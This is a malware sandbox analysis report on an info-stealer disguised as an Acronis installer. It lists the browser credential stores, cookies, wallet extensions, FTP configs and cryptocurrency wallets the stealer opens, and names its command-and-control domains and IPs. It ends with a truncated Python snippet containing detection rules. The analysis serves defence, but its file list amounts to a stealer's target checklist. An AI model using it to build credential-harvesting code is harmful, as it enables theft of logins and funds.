                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqlite
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Directory queried: C:\Users\user\Documents\TQDFJHPUIU
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Directory queried: C:\Users\user\Documents\EOWRVPQCCS
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6176, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Palestine.com PID: 6148, type: MEMORYSTR
MITRE ATT&CK Matrix (matched techniques only, grouped by tactic; the number in parentheses is the badge shown with the technique in the matrix)

Reconnaissance: none
Resource Development: none
Initial Access: none
Execution: Windows Management Instrumentation (21); Command and Scripting Interpreter (2); Scheduled Task/Job (1); PowerShell (3)
Persistence: DLL Side-Loading (1); Scheduled Task/Job (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Process Injection (12); Scheduled Task/Job (1)
Defense Evasion: Deobfuscate/Decode Files or Information (2); Abuse Elevation Control Mechanism (1); Timestomp (1); DLL Side-Loading (1); Masquerading (111); Virtualization/Sandbox Evasion (121); Process Injection (12); Rundll32 (1)
Credential Access: OS Credential Dumping (2); Credential API Hooking (1); Input Capture (21)
Discovery: File and Directory Discovery (12); System Information Discovery (124); Security Software Discovery (321); Process Discovery (3); Virtualization/Sandbox Evasion (121); Application Window Discovery (1); System Owner/User Discovery (2)
Lateral Movement: none
Collection: Data from Local System (41); Credential API Hooking (1); Input Capture (21)
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (114)
Exfiltration: none
Impact: none
Behavior Graph ID: 1579835
Sample: acronis recovery expert del...
Start date: 23/12/2024
Architecture: WINDOWS
Score: 100

Domains and IPs attached to the start node: shearhoaxx.click; slotwang.com; 3 other IPs or domains
Signatures attached to the start node: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

Process tree (the number in brackets is the badge shown next to the process in the graph; "dropped" lines are files written by that process, "network" lines its contacted hosts, "signatures" the signatures attached to it):

acronis recovery expert deluxe 1.0.0.132.rarl.exe [32]
  cmd.exe [3]
    dropped: C:\Users\user\AppData\Local\...\Palestine.com, PE32
    signatures: Drops PE files with a suspicious file extension
    Palestine.com [1]
      network: shearhoaxx.click 172.67.129.49, 443, 49701, 49702 CLOUDFLARENETUS United States
      network: slotwang.com 45.66.248.134, 443, 49710 FREERANGECLOUDCA Russian Federation
      network: kliplorihoe0.shop 172.67.182.135, 443, 49709 CLOUDFLARENETUS United States
      dropped: C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.exe, PE32
      signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Encrypted powershell cmdline option found; LummaC encrypted strings found
      5RLYIRN4B2NNKHJ11UTSZ2.exe
        dropped: C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.tmp, PE32
        signatures: Multi AV Scanner detection for dropped file
        5RLYIRN4B2NNKHJ11UTSZ2.tmp
          dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
          5RLYIRN4B2NNKHJ11UTSZ2.exe
            dropped: C:\Users\user\...\5RLYIRN4B2NNKHJ11UTSZ2.tmp, PE32
            5RLYIRN4B2NNKHJ11UTSZ2.tmp
              dropped: C:\Users\user\AppData\...\is-2QEM3.tmp, PE32; C:\Users\user\...\electronics.exe (copy), PE32; C:\Users\user\...\windowplugin.dll (copy), PE32; 132 other files (105 malicious)
              cmd.exe
                conhost.exe
                tasklist.exe
                find.exe
              cmd.exe
                conhost.exe
                tasklist.exe
                find.exe
              cmd.exe
                conhost.exe
                2 other processes
              4 other processes
                9 other processes
      powershell.exe
        network: kliptedehoa.shop 104.21.35.89, 443, 49711 CLOUDFLARENETUS United States
        dropped: C:\Users\user\AppData\Local\...\tipskins.dll, PE32+; C:\Users\user\AppData\Local\...\msncore.dll, PE32; C:\Users\user\AppData\Local\...\msn.exe, PE32; 19 other files (16 malicious)
        signatures: Powershell drops PE file
        msn.exe
          signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
        conhost.exe
    cmd.exe [2]
    conhost.exe
    7 other processes
acronis recovery expert deluxe 1.0.0.132.rarl.exe [8]
  cmd.exe
    Palestine.com
      dropped: C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.exe, PE32
      signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
      V2DDYDPIWYUTCJYUB0IV5.exe
        dropped: C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.tmp, PE32
        V2DDYDPIWYUTCJYUB0IV5.tmp
          dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
          V2DDYDPIWYUTCJYUB0IV5.exe
            dropped: C:\Users\user\...\V2DDYDPIWYUTCJYUB0IV5.tmp, PE32
            V2DDYDPIWYUTCJYUB0IV5.tmp
              dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    conhost.exe
    tasklist.exe
    6 other processes
rundll32.exe
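Two behaviours in the graph above translate directly into host detection logic: cmd.exe drops and runs a PE named Palestine.com from the user's Temp directory, and cmd.exe drives tasklist.exe into find.exe (the process-listing pattern behind the "Search for Antivirus process" signature). The Python below is an added example, not part of the Joe Sandbox report or of the sample; it applies both rules to a Sysmon-style process-creation stream. The events, PIDs, parent paths and command lines are constructed for the example.

```python
"""Added example: two detection rules derived from the behavior graph,
run over constructed Sysmon-style process-creation events."""
from collections import defaultdict
from dataclasses import dataclass
import re


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of the parent process
    cmdline: str


# Rule 1 pattern: a .com image anywhere below %LOCALAPPDATA%\Temp.
# Anchoring on ".com$" keeps names such as "report.com.txt" out.
TEMP_COM_RE = re.compile(r"\\AppData\\Local\\Temp\\.*\.com$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def find_temp_com_execution(events):
    """Rule 1: return the events whose image is a .com file under Temp."""
    return [e for e in events if TEMP_COM_RE.search(e.image)]


def find_tasklist_find_pairs(events):
    """Rule 2: return the PIDs of cmd.exe parents that spawned both
    tasklist.exe and find.exe, i.e. a `tasklist | find` pipeline."""
    children = defaultdict(set)
    for e in events:
        if basename(e.parent_image) == "cmd.exe":
            children[e.ppid].add(basename(e.image))
    return sorted(ppid for ppid, names in children.items()
                  if {"tasklist.exe", "find.exe"} <= names)


CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EXE = r"C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"

# Constructed process-creation events modelled on the graph above
# (PIDs, parent paths and command lines are assumptions, not report data).
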